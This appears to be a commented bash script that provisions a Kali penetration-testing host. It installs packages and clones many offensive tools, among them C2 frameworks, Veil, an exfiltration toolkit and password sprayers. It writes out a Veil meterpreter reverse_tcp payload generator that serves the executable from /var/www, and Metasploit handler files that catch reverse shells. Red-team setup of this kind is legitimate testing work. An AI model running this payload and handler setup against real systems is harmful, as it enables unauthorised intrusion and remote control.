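#!/bin/bash
# Kali Initial Build Script
#
# Provisions a Kali host: refreshes the archive keyring, upgrades the system,
# installs the base package set, then pulls a long list of third-party tools
# into /opt. Everything runs as root and fetches code from the network, so
# review each source before running it and prefer a disposable build host.

# Refresh the archive signing keys. This .deb is downloaded outside apt's own
# signature checking and then becomes the trust anchor for later packages, so
# compare its SHA-256 with a value obtained over a trusted channel first.
# NOTE(review): the pinned 2018.1 keyring is old - confirm it is still the
# version the target release expects.
# Install only when the download succeeded.
wget https://http.kali.org/kali/pool/main/k/kali-archive-keyring/kali-archive-keyring_2018.1_all.deb &&
  apt install ./kali-archive-keyring_2018.1_all.deb

# initial commands
apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

# basic installs
# -y matches the other apt-get calls; without it the run stalls on a prompt.
apt-get install -y python-setuptools
# NOTE(review): easy_install/pip install into the system Python straight from
# the package index with no version pin or hash check.
easy_install pip
pip install selenium

# apt-get rejects the whole transaction when a single name is unknown, so one
# typo means none of these get installed. "samdum2" is corrected to samdump2
# and the duplicated "unrar" entry is dropped.
# NOTE(review): confirm every remaining name still exists in the target release.
apt-get install -y \
  unrar jxplorer unace rdate krb5-user rar libssl1.0-dev libxml2-dev \
  zlib1g-dev p7zip zip unzip p7zip-full p7zip-rar file-roller \
  nfs-acl-tools freetds-dev bloodhound cadaver csvtool bkhive bettercap \
  creddump creddump7 exiftool fierce htop gobuster html2text ipcalc \
  masscan mimikatz mingw-w64 ldap-utils rsh-client finger \
  linux-exploit-suggester neo4j nishang nfs-common recon-ng rinetd \
  samdump2 seclists smbclient sshuttle sshpass tree wce websploit \
  unicorn-magic xdmcp xwd remmina remmina-plugin-xdmcp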
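# Posh C2 & Supporting Modules
# Install.sh comes straight from the cloned repository and runs as root:
# review it (or check out a reviewed commit) before running this section.
cd /opt
# Explicit target so the checkout lands in /opt even if the cd above failed;
# skipped when a previous run already cloned it.
[ -d /opt/PoshC2_Python ] || git clone https://github.com/nettitude/PoshC2_Python.git /opt/PoshC2_Python
# Run the installer only from inside the checkout. Without this guard a failed
# cd would leave ./Install.sh resolving against whatever directory is current.
if cd /opt/PoshC2_Python; then
  chmod +x ./Install.sh
  ./Install.sh
fi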
# msfconsole.rc
#
# Append the console settings in a single write. The heredoc delimiter is
# quoted so the prompt line's % sequences and double quotes reach the file
# unchanged. The settings enable console/session logging with timestamps,
# which leaves a record of operator activity.
# NOTE(review): both /msfconsole.rc and the spool target /mylog.log sit in the
# filesystem root, and >> means a re-run appends the same lines again.
cat >> /msfconsole.rc <<'EOF'
spool /mylog.log
set consolelogging true
set loglevel 5
set sessionlogging true
set timestampoutput true
setg prompt "%cya%T%grn S:%S%blu J:%J "
EOF
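# TO DO - this bit needs tweaking for latest java stuff
# Install Oracle Java for Cobalt Strike
# Credit for this section of bash script goes to @_RastaMouse
#
# The archive downloaded here becomes the system-wide java, so:
#  - it is fetched over HTTPS, because a plain-HTTP download can be replaced
#    in transit;
#  - curl -f fails on an HTTP error instead of saving the error page as the
#    "archive";
#  - set JDK_SHA256 in the environment to a known-good digest to have the
#    archive verified before it is unpacked (a warning is printed when unset);
#  - nothing is written to /etc/profile or update-alternatives unless the
#    download, the optional check and the extraction all succeeded.
jdk_dir=/usr/local/java
jdk_archive=$jdk_dir/jdk-8u144-linux-x64.tar.gz

mkdir -p "$jdk_dir"

jdk_ok=0
if curl -f -s -j -L -H "Cookie: oraclelicense=accept-securebackup-cookie" \
  https://download.oracle.com/otn-pub/java/jdk/8u144-b01/090f390dda5b47b9b721c7dfaa008135/jdk-8u144-linux-x64.tar.gz \
  -o "$jdk_archive"; then
  if [ -z "${JDK_SHA256:-}" ]; then
    echo "[!] JDK_SHA256 is not set - installing the JDK archive without an integrity check" >&2
    jdk_ok=1
  elif printf '%s  %s\n' "$JDK_SHA256" "$jdk_archive" | sha256sum -c - > /dev/null; then
    jdk_ok=1
  else
    echo "[!] JDK archive does not match JDK_SHA256 - skipping the Java install" >&2
  fi
else
  echo "[!] JDK download failed - skipping the Java install" >&2
fi

if [ "$jdk_ok" -eq 1 ] && tar zxf "$jdk_archive" -C "$jdk_dir"; then
  # Quoted delimiter: $PATH must be written literally so it is expanded at
  # login time. Expanding it here would freeze this script's own PATH into
  # /etc/profile for every user.
  cat >> /etc/profile <<'EOF'
JAVA_HOME=/usr/local/java/jdk1.8.0_144
JRE_HOME=/usr/local/java/jdk1.8.0_144/jre
PATH=$PATH:/usr/local/java/jdk1.8.0_144/bin:/usr/local/java/jdk1.8.0_144/jre/bin
export JAVA_HOME
export JRE_HOME
export PATH
EOF
  update-alternatives --install "/usr/bin/java" "java" "/usr/local/java/jdk1.8.0_144/bin/java" 1
  update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/local/java/jdk1.8.0_144/bin/javaws" 1
  update-alternatives --set java /usr/local/java/jdk1.8.0_144/bin/java
  update-alternatives --set javaws /usr/local/java/jdk1.8.0_144/bin/javaws
fi
rm -f "$jdk_archive"

git clone https://github.com/rsmudge/Malleable-C2-Profiles.git /opt/cobaltstrike/MalleableC2
## Manually grab latest CS and update - no CS licence key here ^_^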
# Third-party tools cloned into /opt, in the order listed. Each repository is
# taken at whatever its default branch currently points to; nothing is pinned
# to a commit or verified, so review a checkout before running code from it.
opt_repos=(
  # CredChecker
  https://github.com/Raikia/CredNinja.git
  # sipvicious
  https://github.com/sandrogauci/sipvicious.git
  # Empire (run setup manually)
  https://github.com/PowerShellEmpire/Empire.git
  # LinkedInt
  https://github.com/mdsecactivebreach/LinkedInt.git
  # AWS Buckets
  https://github.com/W00t3k/inSp3ctor.git
  # Chameleon - Avoid Proxy Filter
  https://github.com/mdsecactivebreach/Chameleon.git
  # ICMP Tunnels
  https://github.com/inquisb/icmpsh.git
  # HTA
  https://github.com/nccgroup/demiguise.git
  # Quick HTTP Wins
  https://github.com/ConsciousHacker/EyeWitness.git
  # Sharepoint Enumeration
  https://github.com/sensepost/SPartan.git
  # LyncSmash
  https://github.com/nyxgeek/lyncsmash.git
  # SubDomain Enumeration
  https://github.com/aboul3la/Sublist3r.git
  # SpiderFoot
  https://github.com/smicallef/spiderfoot.git
)

for repo_url in "${opt_repos[@]}"; do
  cd /opt
  git clone "$repo_url"
done
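# SOAP-UI
# wget's lowercase -o names the *log* file; -O is the option that names the
# downloaded file. With -o the installer was never saved under the path that
# was executed next.
# The download goes into a fresh mktemp directory instead of a fixed /tmp
# name: this script runs as root, and a predictable path in a world-writable
# directory can be pre-created or swapped by another local user before it is
# executed.
# NOTE(review): the installer is run as root with no checksum or signature
# check - pin a known-good SHA-256 and verify it before executing.
cd /opt
if soapui_tmp=$(mktemp -d); then
  soapui_installer=$soapui_tmp/soapui-x64-5.4.0.sh
  wget -q https://s3.amazonaws.com/downloads.eviware/soapuios/5.4.0/SoapUI-x64-5.4.0.sh -O "$soapui_installer" &&
    chmod 700 "$soapui_installer" &&
    "$soapui_installer"
  rm -rf -- "${soapui_tmp:?}"
fi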
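# Pret
cd /opt
git clone https://github.com/RUB-NDS/PRET.git

# Snarf
#
# -y matches the other apt-get calls; without it the run stalls on a prompt.
apt-get install -y nodejs
cd /opt
git clone https://github.com/purpleteam/snarf.git

# Unicorn
cd /opt
git clone https://github.com/trustedsec/unicorn.git

# Veil-Evasion setup
#
cd /opt
git clone https://github.com/Veil-Framework/Veil.git
git clone https://github.com/Veil-Framework/PowerTools.git
echo "[!] Don't forget at the end to run the installer manually!"

# PoshC2
# The "Posh C2 & Supporting Modules" section earlier in this script clones the
# same repository, so clone here only when that checkout is missing.
cd /opt
[ -d /opt/PoshC2_Python ] || git clone https://github.com/nettitude/PoshC2_Python.git /opt/PoshC2_Python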
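# Responder Setup
# Replaces the packaged responder with a git checkout.
cd /opt
[ -d /opt/Responder ] || git clone https://github.com/SpiderLabs/Responder.git /opt/Responder
# Remove the packaged copy and copy files only from inside the checkout.
# Unguarded, a failed clone/cd made "cp -r *" copy the contents of whatever
# directory was current (normally all of /opt) into /usr/bin, after the
# packaged responder had already been deleted.
# NOTE(review): this still drops the whole repository tree into /usr/bin and
# overwrites any same-named file there; a dedicated directory plus a symlink
# would be easier to audit and remove.
if cd /opt/Responder; then
  rm -r /usr/share/responder
  rm /usr/bin/responder
  cp -r ./* /usr/bin
fi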
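# Impacket Setup
# The repository URL used to stand on a line by itself, without "git clone",
# so the shell tried to execute the URL and nothing was cloned.
# NOTE(review): a later section clones impacket from a different GitHub
# organisation (CoreSecurity) into the same directory - settle on one source.
cd /opt
[ -d /opt/impacket ] || git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
# Install only from inside the checkout, so "pip install ." cannot pick up
# another directory's setup.py.
if cd /opt/impacket; then
  pip install .
  cp /opt/impacket/examples/smbrelayx.py /usr/bin
  chmod 755 /usr/bin/smbrelayx.py
  cp /opt/impacket/examples/goldenPac.py /usr/bin
  chmod 755 /usr/bin/goldenPac.py
fi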
#Payload Generation
#
# Writes a helper script to /payload_gen.sh one line at a time. Every write
# uses >>, so running this setup script again appends a second copy of each
# line to the existing file.
cd /opt
# NOTE(review): the Unicorn section earlier in this script clones the same
# repository, so this clone fails when /opt/unicorn already exists.
git clone https://github.com/trustedsec/unicorn.git
echo '#!/bin/bash' >> /payload_gen.sh
# Double-quoted: the $(ifconfig ...) substitution runs now, while this setup
# script executes, and its output is written into the file as a fixed value.
# NOTE(review): confirm that is intended rather than a lookup made each time
# the generated script runs.
echo "ADDY=$(ifconfig eth0 | awk '/inet addr/{print $2}' | awk -F':' '{print $2}')" >> /payload_gen.sh
# Single-quoted from here on: these lines are written literally.
echo 'cd /root/payload_temp' >> /payload_gen.sh
echo 'python /opt/Veil-Evasion/Veil-Evasion.py -p python/meterpreter/rev_tcp -c compile_to_exe=Y use_pyherion=Y LHOST=$ADDY LPORT=443 --overwrite' >> /payload_gen.sh
echo 'sleep 1' >> /payload_gen.sh
# The generated script moves its output into /var/www; anything placed there
# is retrievable by whoever can reach a web server serving that directory.
echo 'mv -f /root/veil-output/compiled/payload.exe /var/www/FreshPayload.exe' >> /payload_gen.sh
# msf Resource Scripts
#
# Two Metasploit resource files, /bounce and /bouncessl, each appended in one
# write. Quoted delimiters keep every line literal.
# NOTE(review): both files set the listen address to 0.0.0.0, which means
# every interface on this host; on a multi-homed or internet-facing machine
# consider binding to one specific address. Because the writes append, a
# re-run duplicates the contents of both files.
cat >> /bounce <<'EOF'
use multi/handler
jobs -K
set payload windows/meterpreter/reverse_tcp
set exitonsession false
set lport 443
set enablestageencoding true
set autorunscript migrate -f
set LHOST 0.0.0.0
exploit -j -z
EOF

cat >> /bouncessl <<'EOF'
use multi/handler
jobs -K
set payload windows/meterpreter/reverse_https
set exitonsession false
set lhost 0.0.0.0
set lport 443
set enablestageencoding true
set autorunscript migrate -f
exploit -j -z
EOF
# foofus OWA enum scripts
#
# NOTE(review): these Perl scripts are fetched over plain HTTP with no
# checksum, so they can be altered in transit; read them before running.
mkdir -p /opt/foofus
cd /opt/foofus
for owa_script in \
  OWALogonBrute.pl \
  OWA55EnumUsersURL.pl \
  OWALightFindUsers.pl \
  OWAFindUsers.pl \
  OWAFindUsersOld.pl; do
  wget "http://www.foofus.net/jmk/tools/owa/${owa_script}"
done
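# Shell_Shocker Setup
cd /opt
git clone https://github.com/mubix/shellshocker-pocs.git

# MAC ADDITIONS
# Powersploit Stuff
# apt-get install powersploit
# PowerSploit is packaged in the Kali repo, but that version doesn't include
# PowerView and PowerUp, so it is cloned from GitHub instead.
# item_success / item_failure are not defined anywhere in this script, so the
# result is reported with printf directly.
if git clone https://github.com/PowerShellMafia/PowerSploit.git /opt/powersploit &> /dev/null; then
  printf '%s\n' "[+] Installed PowerSploit"
else
  printf '%s\n' "[!] PowerSploit clone failed" >&2
fi

# PowerSploit Extras
# Download into each directory only when it exists. /usr/share/powersploit is
# only present if the packaged version is installed; an unguarded cd failure
# would drop the files into whatever directory was current.
# NOTE(review): both files come from the master branch of a third-party
# repository - unpinned and unverified.
for ps_dir in /usr/share/powersploit/ /opt/powersploit/; do
  if cd "$ps_dir"; then
    wget -q https://raw.githubusercontent.com/obscuresec/random/master/StartListener.py
    wget -q https://raw.githubusercontent.com/darkoperator/powershell_scripts/master/ps_encoder.py
  fi
done

# PSNmap
# "cd /opt" and the wget command had been joined on one line, which made cd
# fail with too many arguments and skipped the download entirely. The archive
# is also staged in a mktemp directory rather than a fixed /tmp name, since a
# predictable path in a world-writable directory can be pre-created by
# another local user while this runs as root.
cd /opt
if psnmap_tmp=$(mktemp -d); then
  wget -q https://www.powershelladmin.com/w/images/3/3e/PSnmap.zip -O "$psnmap_tmp/psnmap.zip" &&
    unzip "$psnmap_tmp/psnmap.zip" -d /opt/ &> /dev/null
  rm -rf -- "${psnmap_tmp:?}"
fi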
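# Printer Exploits
cd /opt
git clone https://github.com/TheEvilSaint/praedasploit.git

# DNSCat
cd /opt
git clone https://github.com/lukebaggett/dnscat2-powershell.git

# DomainPasswordSpray
cd /opt
git clone https://github.com/dafthack/DomainPasswordSpray.git

# Atomic-Red-Team
cd /opt
git clone https://github.com/redcanaryco/atomic-red-team.git

# NCC's Cisco Enumeration
cd /opt
git clone https://github.com/nccgroup/cisco-SNMP-enumeration.git

# CTFR - Certificate Transparency Enumeration
cd /opt
git clone https://github.com/UnaPibaGeek/ctfr.git
# The checkout directory is "ctfr" (the script used to cd into "ctft").
# Install only from inside it, so pip never reads a requirements.txt from
# some other directory.
if cd /opt/ctfr; then
  pip3 install -r requirements.txt
fi

# DET - Data Exfil Toolkit
cd /opt
git clone https://github.com/sensepost/DET.git
if cd /opt/DET; then
  pip install -r requirements.txt --user
fi

# NCC Frogger
cd /opt
git clone https://github.com/nccgroup/vlan-hopping---frogger.git
mv vlan-hopping---frogger frogger
if cd /opt/frogger; then
  chmod +x frogger
fi

# HeartBleed Script
cd /opt
git clone https://github.com/OffensivePython/HeartLeak.git

# PowerSCCM
# The URL used to stand alone without "git clone", so nothing was fetched.
cd /opt
git clone https://github.com/PowerShellMafia/PowerSCCM.git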
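# impacket (always fun!)
# NOTE(review): the "Impacket Setup" section earlier in this script names a
# different GitHub organisation (SecureAuthCorp) for the same project and the
# same /opt/impacket directory - settle on one source. The clone is skipped
# when the directory already exists.
cd /opt
[ -d /opt/impacket ] || git clone https://github.com/CoreSecurity/impacket.git /opt/impacket
# Install only from inside the checkout. "oython" was a typo for python, and
# the trailing bare "python setup.py" (no command given) only produced a
# usage error, so it is dropped.
if cd /opt/impacket; then
  python setup.py install
  pip install .
  pip install -r requirements_examples.txt
fi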
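# SprayWMI
cd /opt
git clone https://github.com/trustedsec/spraywmi.git
mv /opt/spraywmi/wmis /opt/spraywmi/wmis.old
cp /usr/bin/pth-wmis /opt/spraywmi/wmis

# PowerShell PopUp 1
cd /opt
git clone https://github.com/burntmacncheese/Powershell-PopupBox.git
# The second URL used to stand alone without "git clone".
cd /opt
git clone https://github.com/cheetz/PowerShell_Popup.git

# UnixWiz NBTScan
# NOTE(review): this is a prebuilt binary fetched over plain HTTP and marked
# executable with no checksum, so it can be replaced in transit. Verify it
# against a known-good SHA-256 or use a packaged build instead.
# mkdir -p keeps a re-run from failing; the download and chmod happen only
# inside the target directory.
mkdir -p /opt/nbtscan
if cd /opt/nbtscan; then
  wget --timeout=5 --waitretry=3 --tries=3 http://www.unixwiz.net/tools/nbtscan-1.0.35-redhat-linux
  chmod +x nbtscan-1.0.35-redhat-linux
fi

# LyncSniper
# The URL used to stand alone without "git clone".
cd /opt
git clone https://github.com/mdsecresearch/LyncSniper.git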
# More third-party tools cloned into /opt, in the order listed. Each one is
# taken at the current tip of its default branch, unpinned and unverified.
more_opt_repos=(
  # DirSearch
  https://github.com/maurosoria/dirsearch.git
  # MailSniper
  https://github.com/dafthack/MailSniper.git
  # MorphHTA
  https://github.com/vysec/morphHTA.git
  # MSDAT
  https://github.com/quentinhardy/msdat.git
  # MDSEC SharpShooter - Payload Generation
  https://github.com/mdsecactivebreach/SharpShooter.git
  # Splunk Malicious Pentest App
  https://github.com/tevora-threat/splunk_pentest_app.git
  # SSH Audit
  https://github.com/arthepsy/ssh-audit.git
  # PowerSploit Setup
  https://github.com/mattifestation/PowerSploit.git
  # Applocker Bypasses
  https://github.com/api0cradle/UltimateAppLockerByPassList.git
)

for repo_url in "${more_opt_repos[@]}"; do
  cd /opt
  git clone "$repo_url"
done
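# PowerTools Setup
# The Veil-Evasion section earlier in this script clones the same repository,
# so clone here only when /opt/PowerTools is missing.
cd /opt
[ -d /opt/PowerTools ] || git clone https://github.com/Veil-Framework/PowerTools.git /opt/PowerTools
# NOTE(review): /var/www is a web root; files copied there are retrievable by
# anyone who can reach a web server serving that directory.
cp /opt/PowerTools/PowerUp/PowerUp.ps1 /var/www
cp /opt/PowerTools/PowerView/powerview.ps1 /var/www

# Iodine Windows Client
# mkdir -p so a re-run does not fail on the existing directory and leave the
# download in /opt instead.
# NOTE(review): the archive is fetched over plain HTTP with no checksum.
mkdir -p /opt/Iodine_Windows_Client
if cd /opt/Iodine_Windows_Client; then
  wget --timeout=5 --waitretry=3 --tries=3 http://code.kryo.se/iodine/iodine-0.7.0-windows.zip
fi

# Pykek Setup
cd /opt
git clone https://github.com/bidord/pykek.git

# carlos perez's asdi scripts
#
# Explicit clone target and absolute source path, so the module copy does not
# depend on which directory is current.
cd /opt
git clone https://github.com/darkoperator/Meterpreter-Scripts.git /opt/carlos-perez-meterpreter
mkdir -p ~/.msf4/modules/post/windows/gather
cp /opt/carlos-perez-meterpreter/post/windows/gather/* ~/.msf4/modules/post/windows/gather/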
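# autoconnect MSF db
update-rc.d postgresql enable
update-rc.d metasploit enable

# setup samba
# Creates /srv/kali and adds a [kali] share definition to smb.conf.
# NOTE(review): the directory is mode 777 and the share allows guest access
# with write permission, so any host that can reach SMB on this machine can
# read and write it without credentials. If that is more than the job needs,
# restrict it (for example with "hosts allow") or keep smbd stopped when the
# share is not in use.
mkdir -p /srv/kali
chmod 777 /srv/kali
# Append the share only once; an unconditional >> added a duplicate [kali]
# section on every run.
if ! grep -q '^\[kali\]' /etc/samba/smb.conf 2> /dev/null; then
  cat >> /etc/samba/smb.conf <<'EOF'
[kali]
 comment = Kali share
 path = /srv/kali
 browseable = yes
 public = yes
 writable = yes
 guest ok = yes
EOF
fi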
# cleanup
#
# Rebuild the locate database, bring packages up to date once more, then
# print the manual follow-up steps (a blank line first, one reminder per line).
updatedb
apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y
printf '%s\n' \
  "" \
  "[!] You also need to install Go from https://golang.org/dl/ and then run 'go get github.com/bettercap/bettercap'" \
  "[!] You must run the setup on Empire manually at /opt/Empire and Veil at /opt/Veil" \
  "[!] Grab latest Mimikatz: https://github.com/gentilkiwi/mimikatz/releases " \
  "[!] Grab latest Nessus Pro and BurpSuitePro too. "